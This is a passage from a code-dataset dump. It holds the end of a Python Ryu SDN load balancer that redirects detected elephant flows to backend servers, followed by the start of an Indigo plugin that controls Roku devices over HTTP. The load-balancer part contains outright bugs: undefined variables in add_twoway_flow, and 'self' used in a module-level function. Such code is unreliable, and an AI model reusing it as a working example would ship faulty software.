hub.sleep(1)\n\n def port_stats(self, datapath):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n datapath.send_msg(req)\n\n @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)\n def _port_stats_reply_handler(self, ev):\n body = ev.msg.body\n for stat in sorted(body, key=attrgetter('port_no'))[:-1]:\n self.throuhput[stat.port_no] = (stat.rx_bytes - self.rx_bytes[stat.port_no]) * 8 / 1024\n self.rx_bytes[stat.port_no] = stat.rx_bytes\n\n with open('server_output_throughput.csv', 'a') as f:\n f.write('{:.0f},{:.0f},{:.0f},{:.0f}\\n'.format(self.throuhput[11], self.throuhput[12], self.throuhput[13],\n self.throuhput[14]))\n\n def _request_stats(self):\n elephant_flows = {}\n elephant_flows[\"10.0.0.1\"] = 0\n elephant_flows[\"10.0.0.2\"] = 0\n elephant_flows[\"10.0.0.3\"] = 0\n elephant_flows[\"10.0.0.4\"] = 0\n elephant_flows[\"10.0.0.5\"] = 0\n elephant_flows[\"10.0.0.6\"] = 0\n elephant_flows[\"10.0.0.7\"] = 0\n elephant_flows[\"10.0.0.8\"] = 0\n elephant_flows[\"10.0.0.9\"] = 0\n elephant_flows[\"10.0.0.10\"] = 0\n\n proc = subprocess.Popen(['ovs-ofctl', 'dump-flows', 's1', '--protocol=OpenFlow15'], stdout=subprocess.PIPE,\n stderr=subprocess.DEVNULL)\n proc.wait()\n lines = proc.stdout.readlines()\n for row in lines:\n if \"=10.0.0.1,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.1\"] += 1\n elif \"=10.0.0.2,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.2\"] += 1\n elif \"=10.0.0.3,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.3\"] += 1\n elif \"=10.0.0.4,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.4\"] += 1\n elif \"=10.0.0.5,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.5\"] += 1\n elif \"=10.0.0.6,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.6\"] += 1\n elif \"=10.0.0.7,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.7\"] += 1\n elif \"=10.0.0.8,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.8\"] += 1\n elif \"=10.0.0.9,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.9\"] += 1\n elif \"=10.0.0.10,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.10\"] += 1\n\n self.elephant_flows = elephant_flows\n\n def SendElephantFlowMonitor(self):\n flowTcp = {'keys': 'link:inputifindex,ipsource,ipdestination,ipprotocol,tcpsourceport,tcpdestinationport',\n 'value': 'bytes'}\n requests.put(self.rt + '/flow/pair/json', data=json.dumps(flowTcp))\n\n threshold = {'metric': 'pair', 'value': 100000 / 8 * 5, 'byFlow': True, 'timeout': 1}\n requests.put(self.rt + '/threshold/elephant/json', data=json.dumps(threshold))\n\n def ElephantFlowMonitor(self):\n eventurl = self.rt + '/events/json?thresholdID=elephant&maxEvents=10&timeout=60'\n eventID = -1\n while True:\n try:\n r = requests.get(eventurl + \"&eventID=\" + str(eventID), timeout=0.01)\n except:\n hub.sleep(1)\n continue\n if r.status_code != 200: break\n events = r.json()\n if len(events) == 0:\n continue\n\n eventID = events[0][\"eventID\"]\n events.reverse()\n for e in events:\n try:\n datapath = self.datapaths[1]\n except:\n continue\n self.priority = 20\n\n [server_ip, host_ip] = re.findall('10\\.0\\.0\\.[0-9]', str(e['flowKey']))\n # print(self.elephant_flows)\n if self.elephant_flows[host_ip] == 1:\n self.priority = 21\n continue\n elif self.elephant_flows[host_ip] != 0:\n continue\n else:\n self.logger.info(\"{}: Elephant flow ( 1Mbps ) detected {}\".format(\n datetime.datetime.now().strftime('%H:%M:%S.%f'), e['flowKey']))\n # self.elephant_flows[host_ip] = 1\n\n self.logger.info(\"{}: Elephant flow ( 1Mbps ) detected {}\".format(\n datetime.datetime.now().strftime('%H:%M:%S.%f'), e['flowKey']))\n\n server_ip = getServerIp(self.loadBalancingAlgorithm)\n\n self.logger.info(\"{}: Elephant flow redirecting to: {}\".format(\n datetime.datetime.now().strftime('%H:%M:%S.%f'), server_ip))\n\n in_port = self.ip_to_port[server_ip]\n eth_type = ether_types.ETH_TYPE_IP\n ip_proto = 0x06\n tcp_port = 5000\n parser = datapath.ofproto_parser\n\n # Elephant flow ( 1Mbps ) detected s1-h5,10.0.0.5,10.0.0.2,6,80,44714\n # Flow from server to host\n match = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n ipv4_src=server_ip,\n ipv4_dst=host_ip,\n ip_proto=ip_proto,\n tcp_src=tcp_port)\n actions = [parser.OFPActionSetField(ipv4_src=self.virtual_ip),\n parser.OFPActionOutput(self.ip_to_port[host_ip])]\n self.add_flow(datapath, self.priority, match, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n\n # Reverse flow host to server\n in_port = self.ip_to_port[host_ip]\n match1 = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n eth_dst=self.ip_to_mac[self.H11_ip],\n ipv4_src=host_ip,\n ipv4_dst=self.virtual_ip,\n ip_proto=ip_proto,\n tcp_dst=tcp_port)\n match2 = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n eth_dst=self.ip_to_mac[self.H12_ip],\n ipv4_src=host_ip,\n ipv4_dst=self.virtual_ip,\n ip_proto=ip_proto,\n tcp_dst=tcp_port)\n match3 = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n eth_dst=self.ip_to_mac[self.H13_ip],\n ipv4_src=host_ip,\n ipv4_dst=self.virtual_ip,\n ip_proto=ip_proto,\n tcp_dst=tcp_port)\n match4 = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n eth_dst=self.ip_to_mac[self.H14_ip],\n ipv4_src=host_ip,\n ipv4_dst=self.virtual_ip,\n ip_proto=ip_proto,\n tcp_dst=tcp_port)\n actions = [parser.OFPActionSetField(ipv4_dst=server_ip),\n parser.OFPActionSetField(eth_dst=self.ip_to_mac[server_ip]),\n parser.OFPActionOutput(self.ip_to_port[server_ip])]\n self.add_flow(datapath, self.priority, match1, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n self.add_flow(datapath, self.priority, match2, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n self.add_flow(datapath, self.priority, match3, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n self.add_flow(datapath, self.priority, match4, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n\n self.logger.info(\"{}: Instaled new flows for elephant flow\".format(\n datetime.datetime.now().strftime('%H:%M:%S.%f')))\n\n @set_ev_cls(ofp_event.EventOFPStateChange, [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def _state_change_handler(self, ev):\n datapath = ev.datapath\n if ev.state == MAIN_DISPATCHER:\n if datapath.id not in self.datapaths:\n self.logger.info(\"%s: Register datapath: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n datapath.id)\n self.datapaths[datapath.id] = datapath\n elif ev.state == DEAD_DISPATCHER:\n if datapath.id in self.datapaths:\n self.logger.info(\"%s: Unregister datapath: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n datapath.id)\n del self.datapaths[datapath.id]\n\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n match = parser.OFPMatch()\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions)\n\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def packet_in_handler(self, ev):\n msg = ev.msg\n dp = msg.datapath\n ofp = dp.ofproto\n ofp_parser = dp.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n etherFrame = pkt.get_protocol(ethernet.ethernet)\n\n # If the packet is an ARP packet, create new flow table\n # entries and send an ARP response.\n if etherFrame.ethertype == ether_types.ETH_TYPE_ARP:\n self.arp_response(dp, pkt, etherFrame, ofp_parser, ofp, in_port)\n return\n elif etherFrame.ethertype == ether_types.ETH_TYPE_IP:\n self.logger.info(\"%s: Got Packet In: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n \"ETH_TYPE_IP\")\n self.add_twoway_flow(dp, msg)\n return\n else:\n self.logger.warning(\"Got Packet In which is neither ARP neither IPv4 !\")\n self.logger.info(\"%s: Got Packet In: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n etherFrame.ethertype)\n return\n\n\n # Sends an ARP response to the contacting host with the\n # real MAC address of a server.\n def arp_response(self, datapath, packet, etherFrame, ofp_parser, ofp, in_port):\n arpPacket = packet.get_protocol(arp.arp)\n dstIp = arpPacket.src_ip\n srcIp = arpPacket.dst_ip\n dstMac = etherFrame.src\n\n # If the ARP request isn't from one of the two servers,\n # choose the target/source MAC address from one of the servers;\n # else the target MAC address is set to the one corresponding\n # to the target host's IP.\n if dstIp != self.H11_ip and dstIp != self.H12_ip and dstIp != self.H13_ip and dstIp != self.H14_ip:\n srcMac = self.ip_to_mac[self.H11_ip]\n # self.logger.info(\"%s: Sending ARP reply to HOST\", datetime.datetime.now().strftime('%H:%M:%S.%f'))\n else:\n srcMac = self.ip_to_mac[srcIp]\n # self.logger.info(\"%s: Sending ARP reply to SERVER\", datetime.datetime.now().strftime('%H:%M:%S.%f'))\n\n e = ethernet.ethernet(dstMac, srcMac, ether_types.ETH_TYPE_ARP)\n a = arp.arp(1, 0x0800, 6, 4, 2, srcMac, srcIp, dstMac, dstIp)\n p = Packet()\n p.add_protocol(e)\n p.add_protocol(a)\n p.serialize()\n\n # ARP action list\n actions = [ofp_parser.OFPActionOutput(ofp.OFPP_IN_PORT)]\n match = ofp_parser.OFPMatch(in_port=in_port)\n # ARP output message\n out = ofp_parser.OFPPacketOut(\n datapath=datapath,\n match=match,\n actions=actions,\n data=p.data\n )\n datapath.send_msg(out) # Send out ARP reply\n # self.logger.info(\"%s: ARP reply send\", datetime.datetime.now().strftime('%H:%M:%S.%f'))\n\n # Sets up the flow table in the switch to map IP addresses correctly.\n def add_flow(self, datapath, priority, match, actions, idle_timeout=None, hard_timeout=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if idle_timeout:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, match=match, instructions=inst,\n idle_timeout=idle_timeout, hard_timeout=hard_timeout)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, match=match, instructions=inst)\n datapath.send_msg(mod)\n\n # Sets up the flow table in the switch to map IP addresses correctly.\n def add_twoway_flow(self, dp, msg, idle_timeout=None, hard_timeout=None):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n inst = [parser.OFPInstructionActions(ofproto.OFPIT_APPLY_ACTIONS,\n actions)]\n if idle_timeout:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, match=match, instructions=inst,\n idle_timeout=idle_timeout, hard_timeout=hard_timeout)\n else:\n mod = parser.OFPFlowMod(datapath=datapath, priority=priority, match=match, instructions=inst)\n datapath.send_msg(mod)\n\npreviousServer = \"10.0.0.13\"\n\n\ndef getServerIp(loadBalancingAlgorithm):\n global previousServer\n\n if loadBalancingAlgorithm == 'random':\n return random.choice([\"10.0.0.11\", \"10.0.0.12\", \"10.0.0.13\", \"10.0.0.14\"])\n\n elif loadBalancingAlgorithm == 'roundRobin':\n if previousServer == \"10.0.0.11\":\n previousServer = \"10.0.0.12\"\n return \"10.0.0.12\"\n elif previousServer == \"10.0.0.12\":\n previousServer = \"10.0.0.13\"\n return \"10.0.0.13\"\n elif previousServer == \"10.0.0.13\":\n previousServer = \"10.0.0.14\"\n return \"10.0.0.14\"\n else:\n previousServer = \"10.0.0.11\"\n return \"10.0.0.11\"\n\n elif loadBalancingAlgorithm == 'leastBandwidth':\n if self.throuhput[11:15].index(min(self.throuhput[11:15])) == 11:\n return \"10.0.0.11\"\n elif self.throuhput[11:15].index(min(self.throuhput[11:15])) == 12:\n return \"10.0.0.12\"\n elif self.throuhput[11:15].index(min(self.throuhput[11:15])) == 13:\n return \"10.0.0.13\"\n else:\n return \"10.0.0.14\"\n","sub_path":"LoadBalancer.py","file_name":"LoadBalancer.py","file_ext":"py","file_size_in_byte":20004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"548866877","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n#/////////////////////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\n# Roku Network Remote Control by RogueProeliator \n# \tSee plugin.py for more plugin details and information\n#/////////////////////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\n\n#/////////////////////////////////////////////////////////////////////////////////////////\n# Python imports\n#/////////////////////////////////////////////////////////////////////////////////////////\nimport functools\nimport httplib\nimport os\nimport Queue\nimport re\nimport string\nimport sys\nimport threading\nimport telnetlib\nimport time\nimport urllib\n\nimport indigo\nimport RPFramework\n\n#/////////////////////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\n# RokuNetworkRemoteDevice\n#\tHandles the configuration of a single Roku device that is connected to this plugin;\n#\tthis class does all the 'grunt work' of communications with the Roku\n#/////////////////////////////////////////////////////////////////////////////////////////\n#/////////////////////////////////////////////////////////////////////////////////////////\nclass RokuNetworkRemoteDevice(RPFramework.RPFrameworkRESTfulDevice.RPFrameworkRESTfulDevice):\n\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t# Class construction and destruction methods\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# Constructor called once upon plugin class receiving a command to start device\n\t# communication. The plugin will call other commands when needed, simply zero out the\n\t# member variables\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef __init__(self, plugin, device):\n\t\tsuper(RokuNetworkRemoteDevice, self).__init__(plugin, device)\n\t\t\n\t\t# get the device properties; we may need to upgrade users from the old version of\n\t\t# addresses to the new version\n\t\tdevProps = self.indigoDevice.pluginProps\n\t\t\n\t\ttempRokuIPAddress = devProps.get(u'rokuIPAddress', u'')\n\t\ttempRokuSerialNumber = devProps.get(u'rokuEnumeratedUSN', u'')\n\t\tif tempRokuIPAddress != u'':\n\t\t\tdevProps[u'httpAddress'] = tempRokuIPAddress\n\t\t\tdevProps[u'rokuIPAddress'] = u''\n\t\t\tdevice.replacePluginPropsOnServer(devProps)\n\t\telif tempRokuSerialNumber != u'':\n\t\t\tdevProps[u'httpAddress'] = tempRokuSerialNumber\n\t\t\tdevProps[u'rokuEnumeratedUSN'] = u''\n\t\t\tdevice.replacePluginPropsOnServer(devProps)\n\t\tself.rokuNetworkAddress = devProps.get(u'httpAddress', u'')\n\n\t\tself.cachedIPAddress = u''\n\t\tself.hostPlugin.logger.debug(u'Roku Address is ' + self.rokuNetworkAddress)\n\n\t\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t# Processing and command functions\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# This routine will process the commands that are not processed automatically by the\n\t# base class; it will be called on a concurrent thread\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef handleUnmanagedCommandInQueue(self, deviceHTTPAddress, rpCommand):\n\t\tif rpCommand.commandName == u'SEND_KEYBOARD_STRING':\n\t\t\t# needs to send a string of text to the roku device as a series of keypress\n\t\t\t# commands (RESTFUL_PUT commands)\n\t\t\tvalidatedText = re.sub(r'[^a-z\\d ]', '', rpCommand.commandPayload.lower())\n\t\t\tif validatedText == u'':\n\t\t\t\tself.hostPlugin.logger.debug(u'Ignoring send text to Roku, validated string is blank (source: ' + rpCommand.commandPayload + u')')\n\t\t\telse:\n\t\t\t\tself.hostPlugin.logger.threaddebug(u'Sending keyboard text: ' + validatedText)\n\t\t\t\tpauseBetweenKeys = float(self.indigoDevice.pluginProps.get(u'rokuLiteralCommandPause', u'0.1'))\n\t\t\t\tfor char in validatedText:\n\t\t\t\t\tself.queueDeviceCommand(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Lit_' + urllib.quote_plus(char), postCommandPause=pauseBetweenKeys))\n\t\t\n\t\telif rpCommand.commandName == u'DOWNLOAD_CHANNEL_ICONS':\n\t\t\t# the user has requested that we download all of the icons for channels on the Roku device...\n\t\t\tdownloadDestination = rpCommand.commandPayload\n\t\t\tif downloadDestination == None or downloadDestination == u'':\n\t\t\t\tdownloadDestination = indigo.server.getInstallFolderPath()\n\t\t\t\tself.hostPlugin.logger.threaddebug(u'Indigo installation folder: ' + downloadDestination)\n\t\t\t\tdownloadDestination = os.path.join(downloadDestination, u'IndigoWebServer/images/controls/static')\n\t\t\t \n\t\t\t# retrieve the list of channels/applications and attempt to download\n\t\t\t# each application's icon\n\t\t\tappList = self.retrieveAppList()\n\t\t\t\n\t\t\tfor rokuApp in appList:\n\t\t\t\ticonFile = None\n\t\t\t\ttry:\n\t\t\t\t\tapplicationId = rokuApp[0]\n\t\t\t\t\tapplicationName = rokuApp[2]\n\t\t\t\t\t\n\t\t\t\t\tself.hostPlugin.logger.debug(u'Attempting download of icon for App #' + applicationId + u' (' + applicationName + u')')\n\t\t\t\t\tconn = httplib.HTTPConnection(deviceHTTPAddress[0], deviceHTTPAddress[1])\n\t\t\t\t\tconn.connect()\n\t\t\t\t\trequest = conn.putrequest(u'GET', u'/query/icon/' + applicationId)\n\t\t\t\t\tconn.endheaders()\n\t\t\t\t\t\n\t\t\t\t\ticonResponse = conn.getresponse()\n\t\t\t\t\ticonImageExtension = iconResponse.getheader(u'content-type').replace(u'image/', u'')\n\t\t\t\t\ticonImageSaveFN = os.path.join(downloadDestination, u'RokuChannelIcon_' + applicationId + u'.' + iconImageExtension)\n\t\t\t\t\t\n\t\t\t\t\tself.hostPlugin.logger.debug(u'Saving icon to ' + iconImageSaveFN)\n\t\t\t\t\ticonFile = open(RPFramework.RPFrameworkUtils.to_str(iconImageSaveFN), \"wb\")\n\t\t\t\t\ticonFile.write(iconResponse.read())\n\t\t\t\t\ticonFile.close()\n\t\t\t\t\t\n\t\t\t\t\tconn.close()\n\t\t\t\texcept:\n\t\t\t\t\tif iconFile != None:\n\t\t\t\t\t\ticonFile.close()\n\t\t\t\t\tself.hostPlugin.exceptionLog()\n\t\t\t\t\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# This routine should return the HTTP address that will be used to connect to the\n\t# RESTful device. It may connect via IP address or a host name\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef getRESTfulDeviceAddress(self):\n\t\tself.hostPlugin.logger.debug(u'IP address requested for Roku Device: ' + self.rokuNetworkAddress)\n\t\t\t\n\t\t# if the ip address has not been filled in then we must look it up by serialNumber\n\t\t# via the SSDP service\n\t\tif self.hostPlugin.isIPv4Valid(self.rokuNetworkAddress):\n\t\t\tipAddress = self.rokuNetworkAddress\n\t\telse:\n\t\t\tipAddress = self.obtainRokuIPAddress(self.rokuNetworkAddress)\n\t\t\t\n\t\t# return the IP address to the calling procedure...\n\t\treturn (ipAddress, 8060)\n\t\t\t\n\t\t\t\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t# Private Utility Routines\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# This routine will obtain the IP address for a Roku given the serial number; it does\n\t# this synchronously with the expectation that it is called from a concurrent thread\n\t# when asynchronous operations are required\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef obtainRokuIPAddress(self, serialNumber):\n\t\tif self.cachedIPAddress == u'':\n\t\t\tself.hostPlugin.updateUPNPEnumerationList(self.indigoDevice.deviceTypeId)\n\t\t\trokuList = self.hostPlugin.enumeratedDevices\n\t\t\tfor rokuDevice in rokuList:\n\t\t\t\tenumeratedSerial = string.replace(rokuDevice.usn, 'uuid:roku:ecp:', '')\n\t\t\t\tif enumeratedSerial == serialNumber:\n\t\t\t\t\tdiscoveredIPAddress = re.match(r'http://([\\d\\.]*)\\:{0,1}(\\d+)', rokuDevice.location, re.I).group(1)\n\t\t\t\t\tself.hostPlugin.logger.debug(u'Found IP address of ' + discoveredIPAddress + u' for serial #' + serialNumber)\n\t\t\t\t\tself.cachedIPAddress = discoveredIPAddress\n\t\t\t\t\tself.indigoDevice.updateStateOnServer(u'lastDiscoveredIPAddress', value=discoveredIPAddress)\n\t\t\t\t\treturn discoveredIPAddress\n\t\t\t\n\t\t\t# if execution made it through the loop then the device was not found... first attempt\n\t\t\t# to read the last known IP address, then bail with a failure to find\n\t\t\tif self.indigoDevice.states.get(u'lastDiscoveredIPAddress', u'') != u'':\n\t\t\t\tlastKnownIP = self.indigoDevice.states.get(u'lastDiscoveredIPAddress')\n\t\t\t\tself.hostPlugin.logger.debug(u'Using last discovered IP address: ' + lastKnownIP)\n\t\t\t\treturn lastKnownIP\n\t\t\telse:\n\t\t\t\tself.hostPlugin.logger.error(u'IP not found for serial #' + serialNumber)\n\t\t\t\treturn u''\n\t\telse:\n\t\t\treturn self.cachedIPAddress\n\t\t\t\t\n\t\t\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t# Public command-interface functions\n\t#/////////////////////////////////////////////////////////////////////////////////////\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# This routine will retrieve a list of the available applications on the connected\n\t# roku device (it does this synchronously with the expectation that it is called on\n\t# a concurrent thread when necessary\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef retrieveAppList(self):\n\t\ttry:\n\t\t\t# determine the IP address used to connect to the roku device\n\t\t\tdeviceIPAddress = self.getRESTfulDeviceAddress()\n\t\t\t\t\n\t\t\t# send a GET to the roku which should result in a list of applications\n\t\t\t# available (in XML format)\n\t\t\tself.hostPlugin.logger.debug(u'Sending /query/apps request to ' + deviceIPAddress[0])\n\t\t\tconn = httplib.HTTPConnection(deviceIPAddress[0], int(deviceIPAddress[1]))\n\t\t\tconn.connect()\n\t\t\trequest = conn.putrequest(\"GET\", \"/query/apps\")\n\t\t\tconn.endheaders()\n\t\t\t\n\t\t\t# read the response to the query\n\t\t\tresponseToREST = conn.getresponse()\n\t\t\tresponseStatus = responseToREST.status\n\t\t\tbodyText = responseToREST.read()\n\t\t\tself.hostPlugin.logger.threaddebug(u'App list response: ' + RPFramework.RPFrameworkUtils.to_unicode(responseStatus) + u'; body: ' + RPFramework.RPFrameworkUtils.to_unicode(bodyText))\n\t\t\t\n\t\t\t# parse out the XML returned which should be in the format of:\n\t\t\t#\t\n\t\t\t#\t[appname]\n\t\t\t# note that this may not be standard XML... so use a regular expression to parse\n\t\t\treAppParser = re.compile(\"\\(.*)\\\")\n\t\t\tappMatches = reAppParser.findall(bodyText)\n\t\t\treturn appMatches\n\t\texcept:\n\t\t\tself.hostPlugin.exceptionLog()\n\t\t\treturn []\n\t\t\t\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\t# Send a series of commands to attempt to perform a search on a channel\n\t#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\n\tdef performSearchOnChannel(self, selectedChannel, channelLaunchPause, searchText, stopAtSuggestions):\t\t\n\t\t# the search commands depend on the channel being searched... each channel may\n\t\t# require special processing; an empty searchText string will result in the user\n\t\t# just being brought to the search box\n\t\tcommands = []\n\t\t\n\t\tliteralPauseTime = float(self.indigoDevice.pluginProps.get(u'rokuLiteralCommandPause', u'0.1'))\n\t\tirPauseTime = float(self.indigoDevice.pluginProps.get(u'rokuIRCommandPause', u'0.1'))\n\t\t\n\t\t# -=-=- LAUNCH SEARCH SCREEN COMMANDS -=-=-\n\t\tif selectedChannel == u'13':\n\t\t\t# -=-=- AMAZON PRIME -=-=-\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/launch/13'))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=channelLaunchPause))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Select'))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=u'2'))\n\t\t\t\t\n\t\telif selectedChannel == u'12':\n\t\t\t# -=-=- NETFLIX -=-=-\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/launch/12'))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=channelLaunchPause))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Search'))\n\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkCommand.CMD_PAUSE_PROCESSING, commandPayload=u'2'))\n\t\t# -=-=- END LAUNCH SEARCH SCREEN COMMANDS -=-=-\n\t\t\t\t\n\t\t# -=-=- ENTER SEARCH STRING COMMANDS -=-=-\n\t\tif searchText != u'':\n\t\t\tfor char in searchText:\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'/keypress/Lit_' + urllib.quote_plus(char), postCommandPause=literalPauseTime))\n\t\t\t\t\n\t\t# -=-=- POST SEARCH TERM COMMANDS -=-=-\n\t\tif searchText != \"\":\n\t\t\tif stopAtSuggestions == True:\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right', postCommandPause=irPauseTime))\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Right'))\n\t\t\telse:\n\t\t\t\tcommands.append(RPFramework.RPFrameworkCommand.RPFrameworkCommand(RPFramework.RPFrameworkRESTfulDevice.CMD_RESTFUL_PUT, commandPayload=u'http|*|/keypress/Enter'))\n\t\t# -=-=- END 